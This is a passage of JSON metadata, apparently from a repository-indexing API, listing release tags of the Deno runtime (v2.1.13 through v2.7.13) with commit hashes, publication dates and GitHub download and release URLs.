/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind